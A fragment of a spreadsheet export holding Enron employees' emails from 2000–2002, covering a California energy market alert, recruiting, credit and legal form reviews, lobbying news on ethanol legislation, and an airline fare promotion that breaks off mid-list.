_x000D_
The ISO anticipates that it will call stage 3 emergencies (reserves less th=_x000D_
an_x000D_
1.5 percent) for January 19 and will most likely continue to curtail_x000D_
interruptible customers through the weekend. Western energy supplies are be=_x000D_
ing_x000D_
strained by recent heavy usage of hydroelectric facilities where water=20_x000D_
supplies_x000D_
are already as much as 25 percent below average, owing to low precipitation=_x000D_
=20_x000D_
and_x000D_
continued plant outages near 9,000 MW in California. The gravity of the_x000D_
financial condition of California=01,s two largest utilities is exemplified=_x000D_
 by=20_x000D_
the_x000D_
need for other, more creditworthy intermediaries, including California_x000D_
municipal utilities, state agencies, and some unregulated energy suppliers,=_x000D_
 to_x000D_
act as temporary  guarantors for the acquisition of energy on behalf of PG&amp;=_x000D_
E_x000D_
and SCE._x000D_
_x000D_
**end**_x000D_
_x000D_
Follow above URL for full report._x000D_
_x000D_
*********************************************************_x000D_
Come Shoot the Rapids with us at CERAWeek2001, "Shooting the Rapids:_x000D_
Strategies and Risks for the Energy Future" in Houston, February 12-16, 200=_x000D_
1!_x000D_
For more information and to register, please visit_x000D_
http://www20.cera.com/ceraweek/_x000D_
*********************************************************_x000D_
_x000D_
_x000D_
_x000D_
E-mail Category: Alert_x000D_
CERA Knowledge Area(s): Western Energy,_x000D_
_x000D_
**********************************************************************_x000D_
To make changes to your cera.com account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0. Cambridge Energy Research Associates_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 28 Apr 2000 08:15:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'steve.hooser@enron.com'})</t>
  </si>
  <si>
    <t>School Board Election</t>
  </si>
  <si>
    <t>Steve:_x000D_
Just wanted to let you know that Bill is running for an open position on the _x000D_
Cy-Fair School Board.  The election is Saturday May 6th at Emmott but early _x000D_
voting takes place tomorrow from 8-12 at the instructional Support Building _x000D_
on Jones Road.   If you and Julie are planning on voting and are undecided, I _x000D_
hope to solicit your support.  His opponent is Don Ryan._x000D_
Carol</t>
  </si>
  <si>
    <t>Mon, 8 May 2000 13:43:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'cmkenyon@concentric.net'})</t>
  </si>
  <si>
    <t>Re: real options openings?</t>
  </si>
  <si>
    <t>Vince,_x000D_
_x000D_
Thanks very much - I'm looking forward to it,_x000D_
_x000D_
Chris_x000D_
_x000D_
At 09:25 AM 5/8/00 -0500, you wrote:_x000D_
&gt;_x000D_
&gt;Chris,_x000D_
&gt;_x000D_
&gt;We shall make arrangements to bring you over for an interview._x000D_
&gt;Our HR Department will contact you later this week._x000D_
&gt;_x000D_
&gt;_x000D_
&gt;Vince_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;Christopher M Kenyon &lt;cmkenyon@concentric.net&gt; on 05/05/2000 07:56:11 AM_x000D_
&gt;_x000D_
&gt;To:   vkamins@enron.com_x000D_
&gt;cc:_x000D_
&gt;Subject:  real options openings?_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;Dear Vince Kaminski,_x000D_
&gt;     I was auditing Prof Dyer's Real Options class on Thursday when you_x000D_
&gt;spoke_x000D_
&gt;on Enron's activities in this area.  I would be interested in exploring the_x000D_
&gt;possibility of joining the group that works on real options in response to_x000D_
&gt;and in anticipation of Enron's business requirements.  I'm currently_x000D_
&gt;working in the development and application of real options methodology at_x000D_
&gt;Schlumberger.  In particular I'll be speaking at an industry Real Options_x000D_
&gt;Valuation conference in London (http://www.iqpc.co.uk/finance/rov/) and I_x000D_
&gt;just had the paper accepted for publication in Operations Research.  Could_x000D_
&gt;you pass my resume on to the relevant people to have a look at?_x000D_
&gt;_x000D_
&gt;Thanks in advance,_x000D_
&gt;_x000D_
&gt;Chris Kenyon_x000D_
&gt;_x000D_
&gt;(See attached file: cmkenyon_cv_may00.doc)_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;Attachment Converted: "c:\eudora\attach\cmkenyon_cv_may001.doc"_x000D_
&gt;</t>
  </si>
  <si>
    <t>Mon, 17 Dec 2001 06:51:07 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'l..nicolay@enron.com', 's..bradford@enron.com', 'rogers.herndon@enron.com', 'john.llodra@enron.com', 'dana.davis@enron.com', 'juan.padron@enron.com', 'wade.stubblefield@enron.com', 'edward.sacks@enron.com', 'richard.ring@enron.com', 'marcus.nettelton@enron.com'})</t>
  </si>
  <si>
    <t>PJM/NEPOOL/NYISO</t>
  </si>
  <si>
    <t>With the cancellation of a number of Surety Bonds by our providers, we are faced with a potential credit crunch in NEPOOL.  _x000D_
_x000D_
Also, it is my understanding (although I haven't seen anything) that our Nov 2001 bills are due in all of the markets on Dec 20, 2001._x000D_
 _x000D_
Christi and I are trying to work out our payment plans (if any) and other requirements to keep our books afloat.  _x000D_
_x000D_
We need to have support on understanding any payment obligations (and bills if we have them) and issues (e.g., Annual Fees).  Who can we talk with for each market?_x000D_
_x000D_
Thanks,_x000D_
_x000D_
Jim</t>
  </si>
  <si>
    <t>Mon, 22 Jan 2001 08:16:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Furnas Decision</t>
  </si>
  <si>
    <t xml:space="preserve">Tracee,_x000D_
_x000D_
Could you print this out and let's try another round together._x000D_
_x000D_
Thanks_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 20 Feb 2001 05:59:00 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">Keegan, please include me (as well as all members of the team) on any _x000D_
distributions when members of the Swap Group are going to be out of the _x000D_
office.  This would include Mark Taylor, Sara Shackleton, Carol St. Clair, _x000D_
Mary Cook, Francisco Pinto Leite, Cheryl Nelson, Bob Bruce, Frank Sayre, _x000D_
Susan Bailey, Samantha Boyd &amp; Stephanie Panus._x000D_
_x000D_
Thanks._x000D_
----- Forwarded by Tana Jones/HOU/ECT on 02/20/2001 01:57 PM -----_x000D_
_x000D_
	Samantha Boyd@ENRON_x000D_
	02/20/2001 01:56 PM_x000D_
		 _x000D_
		 To: Tana Jones/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: Cheryl Nelson_x000D_
_x000D_
Samantha M. Boyd_x000D_
Sr. Legal Specialist_x000D_
Enron North America, Corp._x000D_
1400 Smith, EB3802A_x000D_
Houston, TX  77002_x000D_
Phone:  (713) 853-9188_x000D_
Fax:  (713) 646-3490_x000D_
email:  samantha.boyd@enron.com_x000D_
_x000D_
----- Forwarded by Samantha Boyd/NA/Enron on 02/20/2001 01:48 PM -----_x000D_
_x000D_
	Keegan Farrell_x000D_
	02/20/2001 09:39 AM_x000D_
		 _x000D_
		 To: Stephanie Panus/NA/Enron@Enron, Taffy Milligan/HOU/ECT@ECT, Susan _x000D_
Bailey/HOU/ECT@ECT, Sara Shackleton/HOU/ECT@ECT, Robert Bruce/NA/Enron@Enron, _x000D_
Mark Taylor/HOU/ECT@ECT, Samantha Boyd/NA/Enron@Enron, Kayla _x000D_
Heitmeyer/Enron@EnronXGate, Gregg Penman/Corp/Enron@Enron, Rudwell _x000D_
Johnson/NA/Enron@ENRON_x000D_
		 cc: _x000D_
		 Subject: Cheryl Nelson_x000D_
_x000D_
FYI_x000D_
While traveling in New York this weekend, Cheryl Nelson has become ill.  She _x000D_
is currently in New York, but is expected in the office tomorrow morning.  If _x000D_
you should need to contact her, I will be glad to do so for you.  Feel free _x000D_
to contact me at x5-3317, should you need my assistance.  Thank you for your _x000D_
attention to this matter.  Regards, Keegan_x000D_
</t>
  </si>
  <si>
    <t>Sat, 5 Aug 2000 03:17:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'showard@milbank.com'})</t>
  </si>
  <si>
    <t>frozenset({'richard.b.sanders@enron.com'})</t>
  </si>
  <si>
    <t>Schultes Transcripts</t>
  </si>
  <si>
    <t>Here are rough transcripts of the first five days of Schultes' deposition, _x000D_
which is now in its sixth day.? The lawyers are getting worn down, and _x000D_
Schultes grows stronger every day.? Many lawyers in the room believe Schultes _x000D_
to be the most impressive deposition witness they have ever seen._x000D_
_x000D_
 &lt;&lt;Schultes 7.31.txt&gt;&gt;  &lt;&lt;Schultes 8.01.txt&gt;&gt;  &lt;&lt;Schultes 8.02.txt&gt;&gt;  _x000D_
&lt;&lt;Schultes 8.03.txt&gt;&gt; _x000D_
 &lt;&lt;Schultes 8.04.txt&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Schultes 7.31.txt_x000D_
 - Schultes 8.01.txt_x000D_
 - Schultes 8.02.txt_x000D_
 - Schultes 8.03.txt_x000D_
 - Schultes 8.04.txt</t>
  </si>
  <si>
    <t>Fri, 30 Mar 2001 02:40:00 -0800 (PST)</t>
  </si>
  <si>
    <t>eHRonline Web Address Change</t>
  </si>
  <si>
    <t>This message is intended for eHRonline users only._x000D_
_x000D_
Due to a recent change to eHRonline, the URL (aka "Web address") for _x000D_
accessing eHRonline needs to be changed on your computer.  The change _x000D_
involves adding the letter "s" to the "http" reference in the URL.  The URL _x000D_
for accessing eHRonline should be:   https://eHRonline.enron.com._x000D_
_x000D_
This change should be made by those who have added the URL as a favorite on _x000D_
the browser.</t>
  </si>
  <si>
    <t>Thu, 7 Jun 2001 04:10:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'tracy.ngo@enron.com', 'stewart.rosman@enron.com'})</t>
  </si>
  <si>
    <t>SMUD</t>
  </si>
  <si>
    <t>Tracy and Stewart:_x000D_
I think that they are waiting on our response to their latest e-mail dated _x000D_
5/23 which I forwarded to you.  Any thoughts?_x000D_
Carol St. Clair_x000D_
EB 3889_x000D_
713-853-3989 (Phone)_x000D_
713-646-3393 (Fax)_x000D_
carol.st.clair@enron.com</t>
  </si>
  <si>
    <t>Wed, 6 Mar 2002 07:58:04 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'mike.bryant@enron.com'})</t>
  </si>
  <si>
    <t>FW: Blackberry's</t>
  </si>
  <si>
    <t>If you would like me to have one -- i would prefer not to have to ask Steve Hotte and Rod H for approval._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	O'Gorman, Karon  _x000D_
Sent:	Tuesday, March 05, 2002 1:23 PM_x000D_
To:	Bellard, Dannis; Bryant, Mike_x000D_
Cc:	Love, Chris_x000D_
Subject:	Blackberry's_x000D_
_x000D_
Dannis and Mike,_x000D_
_x000D_
Due to Financial constraints in November and December, all orders were cancelled.  Therefore to reorder, I would need for you to send me an email with your SAP Coding, Business Purpose and Manager Approval._x000D_
_x000D_
I then take that information and have to get IT Director approval, VP approval, CIO approval and CFO approval - This is still in force and to replace your order, please send me the email._x000D_
_x000D_
Thanks, Karon</t>
  </si>
  <si>
    <t>Thu, 12 Oct 2000 03:56:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'expense.report@enron.com'})</t>
  </si>
  <si>
    <t>Susan Scott's expense report 10-10-00</t>
  </si>
  <si>
    <t xml:space="preserve">OK.  df_x000D_
---------------------- Forwarded by Drew Fossum/ET&amp;S/Enron on 10/12/2000 _x000D_
10:56 AM ---------------------------_x000D_
_x000D_
_x000D_
DENISE LAGESSE_x000D_
10/11/2000 02:30 PM_x000D_
To: Drew Fossum/ET&amp;S/Enron@ENRON_x000D_
cc: Susan Scott/ET&amp;S/Enron@ENRON _x000D_
_x000D_
Subject: Susan Scott's expense report 10-10-00_x000D_
_x000D_
Please approve Susan's expense report, and copy me on your approval.  Thanks!_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 9 Aug 2000 06:31:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'kenny.soignet@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'heather.kendall@enron.com', 'denae.umbower@enron.com', 'jim.schwieger@enron.com', 'clayton.vernon@enron.com', 'kimberly.hillis@enron.com', 'patricia.tlapek@enron.com', 'elsa.piekielniak@enron.com', 'janet.dietrich@enron.com', 'julie.gomez@enron.com', 'robert.lloyd@enron.com', 'sunil.dalal@enron.com', 'kenny.soignet@enron.com', 'keith.holst@enron.com', 'scott.neal@enron.com', 'kenneth.shulklapper@enron.com', 'chris.connelly@enron.com', 'marc.horowitz@enron.com', 'per.sekse@enron.com', 'fred.lagrasta@enron.com', 'frank.hayden@enron.com', 'berney.aucoin@enron.com', 'joseph.hrgovcic@enron.com', 'colleen.sullivan@enron.com', 'daniel.diamond@enron.com', 'lee.papayoti@enron.com', 'jean.mrha@enron.com', 'jeffrey.shankman@enron.com', 'phillip.allen@enron.com', 'liz.taylor@enron.com', 'paul.lucci@enron.com', 'matthew.lenhart@enron.com', 'thomas.martin@enron.com', 'calvin.johnson@enron.com', 'robert.shiring@enron.com', 'chris.foster@enron.com', 'brian.hoskins@enron.com', 'hunter.shively@enron.com', 'jennifer.fraser@enron.com', 'sandra.brawner@enron.com', 'nicole.la@enron.com', 'michael.cowan@enron.com', 'john.arnold@enron.com'})</t>
  </si>
  <si>
    <t>AGA for 8/4/00 is 65</t>
  </si>
  <si>
    <t>Wed, 1 Mar 2000 09:35:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'bootes@plainsgt.org'})</t>
  </si>
  <si>
    <t>Electric Power Agreement</t>
  </si>
  <si>
    <t xml:space="preserve">Attached is a clean and redlined version the agreement with our revisions._x000D_
</t>
  </si>
  <si>
    <t>Tue, 6 Feb 2001 07:52:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Most Innovative -- Six Years Straight</t>
  </si>
  <si>
    <t>We've done it again, everyone.   Enron has been named the "Most Innovative _x000D_
Company in America" for the sixth consecutive year by Fortune.  That's right _x000D_
-- six years in a row.   We continue to be recognized by our industry peers _x000D_
and other corporate executives and securities analysts as the company that _x000D_
sets the standard for doing business in the new economy.  Congratulations to _x000D_
all of you for making it happen._x000D_
_x000D_
Enron placed No. 18 overall on Fortune's list of the nation's 535 "Most _x000D_
Admired Companies," up from No. 36 last year.  We also were ranked among the _x000D_
top five in "Quality of Management," "Quality of Products/Services" and _x000D_
"Employee Talent."  _x000D_
_x000D_
This issue of Fortune is now available in airports and will be on newsstands _x000D_
Monday, Feb. 12.  For more information, go to www.fortune.com.</t>
  </si>
  <si>
    <t>Tue, 9 Jan 2001 01:56:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Why don't you buy deep in the money put options?  They will have a high delta _x000D_
and hence move almost dollar for dollar with the stock.</t>
  </si>
  <si>
    <t>Tue, 2 Jan 2001 03:12:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'acrawford@sonypictures.com'})</t>
  </si>
  <si>
    <t>Anne: It was great to see you, you look great and seem happy. I hope all goes _x000D_
well for you in the year to come. BT</t>
  </si>
  <si>
    <t>Fri, 25 May 2001 01:50:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>FW: Select Energy EEI and ISDA LOC Formats</t>
  </si>
  <si>
    <t>Carol - I have reviewed the changes in both forms attached.  In the LOC, I _x000D_
think that they are getting at the point to allow for partial drawings and _x000D_
requesting to reduce the auto renewal notice clause to 30 days from 90 days.  _x000D_
Seems okay to me.  The proposed changes in the Letter of Credit Provisions, _x000D_
please ignore.  I have discussed this with them and they have come off it._x000D_
_x000D_
Ed Sacks_x000D_
_x000D_
 -----Original Message-----_x000D_
From:  moonevw@selectenergy.com@ENRON _x000D_
[mailto:IMCEANOTES-moonevw+40selectenergy+2Ecom+40ENRON@ENRON.com] _x000D_
Sent: Friday, May 25, 2001 8:36 AM_x000D_
To: Sacks, Edward_x000D_
Cc: morisjr@selectenergy.com; lemelpe@NU.COM_x000D_
Subject: Select Energy EEI and ISDA LOC Formats_x000D_
_x000D_
Ed-_x000D_
_x000D_
We received an email from your attorney about the LOC format for the two_x000D_
contracts.  Our legal counsel has reviewed the format and the provisions_x000D_
for the LOC and we have two proposed changes to the LOC format and one_x000D_
proposed change to the Letter of Credit Provisions.  Please call me to_x000D_
discuss these issues._x000D_
_x000D_
_x000D_
_x000D_
(See attached file: Enron LOC language EEI 052501.doc)_x000D_
_x000D_
_x000D_
(See attached file: Enron ISDA LOC Format 052501.doc)_x000D_
_x000D_
We would like to keep this process moving forward and finalize the_x000D_
contracts._x000D_
_x000D_
Thanks for your assistance._x000D_
_x000D_
Regards-_x000D_
_x000D_
Valerie Mooney_x000D_
 - Enron LOC language EEI 052501.doc_x000D_
 - Enron ISDA LOC Format 052501.doc</t>
  </si>
  <si>
    <t>Thu, 4 May 2000 07:52:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'ted.robinson@enron.com', 'john.palmisano@enron.com', 'cynthia.sandherr@enron.com', 'joe.hillings@enron.com', 'susan.worthen@enron.com', 'lou.potempa@enron.com', 'rob.bradley@enron.com', 'joe.kolb@enron.com', 'stanley.horton@enron.com', 'chris.long@enron.com', 'richard.shapiro@enron.com', 'marc.phillips@enron.com', 'steven.kean@enron.com', 'michael.terraso@enron.com', 'mary.schoen@enron.com', 'micha.makowsky@enron.com', 'joe.allen@enron.com', 'carolyn.green@enron.com', 'john.wodraska@enron.com', 'michael.robison@enron.com', 'diane.bazelides@enron.com', 'james.prentice@enron.com', 'sandra.mccubbin@enron.com', 'mark.palmer@enron.com', 'stacey.bolton@enron.com'})</t>
  </si>
  <si>
    <t>Daschle/Lugar legislation</t>
  </si>
  <si>
    <t>Sen. Richard Lugar (R-IN), Chairman of the Senate Agriculture Committee, has _x000D_
officially agreed to sponsor legislation drafted by Sen. Tom Daschle (D-SD) _x000D_
-- titled the "Renewable Fuels Act".  A summary is attached.   The two _x000D_
Senators are planning to introduce the bill attached) in the next few days, _x000D_
and then selectively pursue co-sponsors.  Senators Lugar and Daschle are _x000D_
expected to meet with Senate Environment Committee Chairman Bob Smith (R-NH) _x000D_
in the near future.  _x000D_
_x000D_
I met with Senate Environment Committee staff yesterday, who indicated that _x000D_
they would like to hold a May 25 Committee mark up of S. 1886 _x000D_
(Smith-Inhofe-Feinstein bill), which they consider the "primary" vehicle for _x000D_
considering RFG and MTBE issues.   Chairman Smith will not likely endorse the _x000D_
Daschle/Lugar bill, but will open the door for dialogue "with the ethanol _x000D_
interests."    One of the primary issues that Committee staff have not been _x000D_
able to resolve is how to get ethanol support for oxygenate waiver _x000D_
legislation.   Lugar and Daschle will likely have a great deal of impact on _x000D_
how much of their bill is considered along with S. 1886 at the May 25 markup._x000D_
_x000D_
Pro-ethanol provisions may not see much support at the Senate Environment _x000D_
Committee level, but if the legislation moves to the Senate floor, there _x000D_
could be much more support for some of Lugar's/Daschle's proposals._x000D_
_x000D_
I will keep you posted as the legislation develops and as our efforts to find _x000D_
support for MTBE producer "incentives" continues._x000D_
_x000D_
_x000D_
_x000D_
Jeff Keeler_x000D_
Director, Environmental Strategies_x000D_
Enron_x000D_
(202) 466-9157</t>
  </si>
  <si>
    <t>Tue, 10 Apr 2001 06:59:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>FW: Enron Recruitment</t>
  </si>
  <si>
    <t>Vince:  I'm sure that you are already aware of this, but I wanted to forward _x000D_
it to you since this didn't come up in our meeting the other morning...._x000D_
_x000D_
Molly_x000D_
_x000D_
 -----Original Message-----_x000D_
From:  Koepke, Gwyn  _x000D_
Sent: Tuesday, April 10, 2001 1:20 PM_x000D_
To: rtlambert@mail.jhuwash.jhu.edu_x000D_
Cc: Molly Magee/HOU/ECT@ENRON_x000D_
Subject: Enron Recruitment_x000D_
_x000D_
Dear Ron,_x000D_
_x000D_
My boss, Enron's chief international economist, is interested in talking with _x000D_
SAIS grads who might want to come to Houston and do economics work.  Same _x000D_
drill as last time, looking for someone whose done the quant track but with _x000D_
excellent writing skills.  I think I sent you a job description a few months _x000D_
back._x000D_
_x000D_
Can you help identify some candidates, and send their resumes our way?  Molly _x000D_
Magee is our recruiting expert and she can help setup the interviews with _x000D_
Maureen.  Maureen is still in London on secondment but is available to _x000D_
interview people of the phone.  _x000D_
_x000D_
Thanks for your help._x000D_
_x000D_
Gwyn</t>
  </si>
  <si>
    <t>Tue, 9 Jan 2001 12:23:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'co.o.l._010901@airmail.continental.com'})</t>
  </si>
  <si>
    <t>CO.O.L.TRAVEL SPECIALS FOR Kevin Ruscitti</t>
  </si>
  <si>
    <t>CO.O.L. TRAVEL SPECIALS_x000D_
DOMESTIC U.S._x000D_
Wednesday, January 10, 2001_x000D_
****************************************_x000D_
_x000D_
_x000D_
UP TO 5% SAVINGS WITH WINTER FARE SALE_x000D_
Book on_x000D_
http://airmail.continental.com/cgi-bin5/flo?y=3DeCws0BevJT0Ow0QvCg_x000D_
and save up to 5% on already low fares to select markets.   Hurry though, t=_x000D_
his_x000D_
sale ends January 12, 2001_x000D_
_x000D_
_x000D_
****************************************_x000D_
 TABLE OF CONTENTS FOR CO.O.L. TRAVEL SPECIALS_x000D_
1. CO.O.L. Travel Specials Offers_x000D_
2. Featured Fares Sample Destinations_x000D_
3. Continental Vacations Offers_x000D_
4. Alamo Rent A Car Offers_x000D_
5. National Car Rental Offers_x000D_
6. Sheraton, Westin, and Four Points Hotel Offers_x000D_
7. Hilton Hotel Offers_x000D_
_x000D_
****************************************_x000D_
This week's specials are good for the following markets departing Saturday,_x000D_
January 13 and returning on either Monday, January 15 or Tuesday, January_x000D_
16, 2001.  Please see the Rules/Terms and Conditions listed at the end of_x000D_
this e-mail._x000D_
****************************************_x000D_
_x000D_
1.  CO.O.L. Travel Specials Offers_x000D_
_x000D_
Purchase CO.O.L. Travel Specials online until 11:59pm (CST) Friday at_x000D_
http://airmail.continental.com/cgi-bin5/flo?y=3DeCws0BevJT0Ow0E3G_x000D_
You can also purchase CO.O.L. Travel Specials for an additional cost of $20_x000D_
per ticket through our telephone service at 1-800-642-1617._x000D_
_x000D_
********************************_x000D_
TRAVEL MAY ORIGINATE IN EITHER CITY_x000D_
********************************_x000D_
****Roundtrip BETWEEN  CLEVLAND, OH  and:_x000D_
_x000D_
$119 - Buffalo, NY_x000D_
$119 - Dayton, OH_x000D_
$119 - Lansing, MI_x000D_
$139 - Los Angeles, CA_x000D_
$139 - Milwaukee, WI_x000D_
$139 - New York  (LaGuardia only)_x000D_
$139 - Raleigh Durham, NC_x000D_
$119 - Rochester, NY_x000D_
$119 - Washington, DC (Dulles Airport only)_x000D_
_x000D_
_x000D_
****Roundtrip BETWEEN  HOUSTON, TX  and:_x000D_
_x000D_
$159 - Colorado Springs, CO_x000D_
$139 - Greensboro/Piedmont Triad, NC_x000D_
$109 - Lafayette, LA_x000D_
$99 - McAllen /Rio Grand Valley, TX_x000D_
$119 - Midland/Odessa, TX_x000D_
$129 - Oklahoma City, OK_x000D_
$139 - Raleigh Durham, NC_x000D_
$139 - San Jose, CA_x000D_
$139 - Washington, DC (National Airport only)_x000D_
_x000D_
_x000D_
****Roundtrip BETWEEN  NEW YORK/NEWARK  and:_x000D_
_x000D_
$109 - Boston, MA_x000D_
$99 - Buffalo, NY_x000D_
$119 - Greensboro/Piedmont Triad, NC_x000D_
$139 - Jacksonville, FL_x000D_
$179 - Kansas City, MO_x000D_
$169 - Los Angeles, CA_x000D_
$129 - Norfolk, VA_x000D_
$109 - Providence, RI_x000D_
$129 - Richmond, VA_x000D_
$89 - Rochester, NY_x000D_
_x000D_
_x000D_
********************************_x000D_
2.  FEATURED FARES SAMPLE DESTINATION_x000D_
_x000D_
Choose your fare, find your flight. Or, quickly sift through all our great_x000D_
featured fares by choosing a destination or origin. Be spontaneous. Get out_x000D_
of town. Current Featured Fares destinations include:_x000D_
_x000D_
 New York, Philadelphia, Los Angeles, San Francisco,_x000D_
 Austin, Seattle, and many more._x000D_
_x000D_
Note: Featured Fares change often. To see a regularly-updated online list_x000D_
and purchase our Featured Fares, visit the website at:_x000D_
http://airmail.continental.com/cgi-bin5/flo?y=3DeCws0BevJT0Ow0uTb_x000D_
(Capacity controls and other restrictions apply)_x000D_
_x000D_
_x000D_
********************************_x000D_
3.  CONTINENTAL VACATIONS OFFERS_x000D_
_x000D_
Are you thinking about how you are going to plan you next vacation?  Let_x000D_
Continental Airlines Vacations take the hassle out of vacation planning wit=_x000D_
h_x000D_
easy-to-plan travel packages that provide exciting destinations plus_x000D_
memories that will last a lifetime!_x000D_
_x000D_
Check out_x000D_
http://airmail.continental.com/cgi-bin5/flo?y=3DeCws0BevJT0Ow0DoAK_x000D_
to see our newest addition: INTERNET ONLY SPECIALS!_x000D_
_x000D_
_x000D_
********************************_x000D_
4.  CO.O.L. TRAVEL SPECIALS FROM ALAMO RENT A CAR_x000D_
_x000D_
This week, Alamo (R) offers great rates in the following cities. Rates_x000D_
listed below are valid on compact class vehicles at airport locations_x000D_
listed.  Other car types may be available. Rates are valid from Saturday,_x000D_
January 12 to Tuesday, January 16, 2001._x000D_
-------------------------------_x000D_
$26 a day in:  Newark, NJ (EWR)_x000D_
$26 a day in:  Boston, MA (BOS)_x000D_
$18 a day in:  Buffalo, NY (BUF)_x000D_
$20 a day in:  Cleveland, OH (CLE)_x000D_
$26 a day in:  Colorado Springs, CO (COS)_x000D_
$18 a day in:  Washington, DC/National airport only (DCA)_x000D_
$18 a day in:  Greensboro, NC (GSO)_x000D_
$18 a day in:  Washington, DC/Dulles airport only (IAD)_x000D_
$18 a day in:  Houston, TX (IAH)_x000D_
$26 a day in:  Jacksonville, FL (JAX)_x000D_
$20 a day in:  Los Angeles, CA (LAX)_x000D_
$18 a day in:  Kansas City, MO (MCI)_x000D_
$18 a day in:  Milwaukee, WI (MKE)_x000D_
$26 a day in:  Providence, RI (PVD)_x000D_
$18 a day in:  Raleigh Durham, NC (RDU)_x000D_
$20 a day in:  San Jose, CA (SJC)_x000D_
_x000D_
_x000D_
To receive special Continental CO.O.L. discounted rates, simply make advanc=_x000D_
e_x000D_
reservations and be sure to request ID # 596871 and Rate Code 33. Book your_x000D_
reservation online at:_x000D_
http://airmail.continental.com/cgi-bin5/flo?y=3DeCws0BevJT0Ow0EoVg or conta=_x000D_
ct=20_x000D_
Alamo at 1-800 GO ALAMO._x000D_
_x000D_
*If you are traveling to a city or a different date that is not listed,_x000D_
Alamo offers you up to 20% off their retail rates when you book online at:_x000D_
http://airmail.continental.com/cgi-bin5/flo?y=3DeCws0BevJT0Ow0EoWh_x000D_
_x000D_
For complete details on these offers, please refer to Alamo's terms and_x000D_
conditions below._x000D_
_x000D_
_x000D_
****************************************_x000D_
5.  CO.O.L. TRAVEL SPECIALS FROM NATIONAL CAR RENTAL_x000D_
This week, National (R) offers great rates in the following cities. Rates_x000D_
listed below are valid on compact class vehicles at airport locations_x000D_
listed. Other car types may be available. Rates are valid from Saturday,_x000D_
January 12 to Tuesday, January 16, 2001._x000D_
------------------------------------------_x000D_
$27 a day in:  Newark, NJ (EWR)_x000D_
$27 a day in:  Boston, MA (BOS)_x000D_
$19 a day in:  Buffalo, NY (BUF)_x000D_
$21 a day in:  Cleveland, OH (CLE)_x000D_
$19 a day in:  Dayton, OH (DAY)_x000D_
$19 a day in:  Washington, DC/National airport only (DCA)_x000D_
$19 a day in:  Greensboro, NC (GSO)_x000D_
$19 a day in:  Washington, DC/Dulles airport only (IAD)_x000D_
$19 a day in:  Houston, TX (IAH)_x000D_
$27 a day in:  Jacksonville, FL (JAX)_x000D_
$21 a day in:  Los Angeles, CA (LAX)_x000D_
$27 a day in:  Lafayette, LA (LFT)_x000D_
$45 a day in:  New York/LaGuardia only(LGA)_x000D_
$21 a day in:  Midland/Odessa, TX (MAF)_x000D_
$19 a day in:  Kansas City, MO (MCI)_x000D_
$27 a day in:  McAllen/Rio Grand Valley, TX (MFE)_x000D_
$19 a day in:  Norfolk, VA (ORF)_x000D_
$19 a day in:  Raleigh Durham, NC (RDU)_x000D_
$21 a day in:  Richmond, VA (RIC)_x000D_
$19 a day in:  Rochester, NY (ROC)_x000D_
$21 a day in:  San Jose, CA (SJC)_x000D_
_x000D_
_x000D_
To receive your special Continental Airlines CO.O.L. Travel Specials_x000D_
discounted rates, simply make your reservation in advance and be sure to_x000D_
request Product Code COOLUS.  Make your reservation online or contact_x000D_
National at 1-800-CAR-RENT (1-800-227-7368).  Book your reservation online_x000D_
at:_x000D_
http://airmail.continental.com/cgi-bin5/flo?y=3DeCws0BevJT0Ow0D7m7_x000D_
_x000D_
* If you are traveling to a city or a different date that is not listed,_x000D_
National offers you up to 20% off their retail rates when you book online a=_x000D_
t:_x000D_
http://airmail.continental.com/cgi-bin5/flo?y=3DeCws0BevJT0Ow0DwDV_x000D_
_x000D_
For complete details on these offers, please refer to National's terms and_x000D_
conditions below._x000D_
_x000D_
_x000D_
_x000D_
****************************************_x000D_
6.  CO.O.L. TRAVEL SPECIALS LAST-MINUTE WEEKEND_x000D_
RATES FROM WESTIN, SHERATON, FOUR POINTS, ST. REGIS,_x000D_
THE LUXURY COLLECTION, AND W HOTELS_x000D_
_x000D_
Here is a sample of this weekend=01,s participating hotels that match_x000D_
Continental=01,s flight destinations.  Visit our website for a complete_x000D_
listing of participating hotels:_x000D_
_x000D_
--------------------------------------_x000D_
Boston, MA - The Westin Waltham - $89.00_x000D_
Boston, MA - Sheraton Braintree Hotel - $90.00_x000D_
Boston, MA - Sheraton Newton Hotel - $90.00_x000D_
Boston, MA - Sheraton Ferncroft Resort - $79.00_x000D_
Boston, MA - Sheraton Nashua Hotel - $75.00_x000D_
Boston, MA - Sheraton Colonial Hotel and Golf Club Boston - $79.00_x000D_
Boston, MA - Sheraton Lexington Inn - $64.00_x000D_
_x000D_
Buffalo, NY - Four Points by Sheraton Dunkirk - $51.00_x000D_
Buffalo, NY - Four Points by Sheraton Niagara Falls - by the Falls - $199.0=_x000D_
0_x000D_
Buffalo, NY - Four Points by Sheraton Niagara Falls - $70.85_x000D_
_x000D_
Cleveland, OH - Sheraton Cleveland City Centre Hotel - $88.00_x000D_
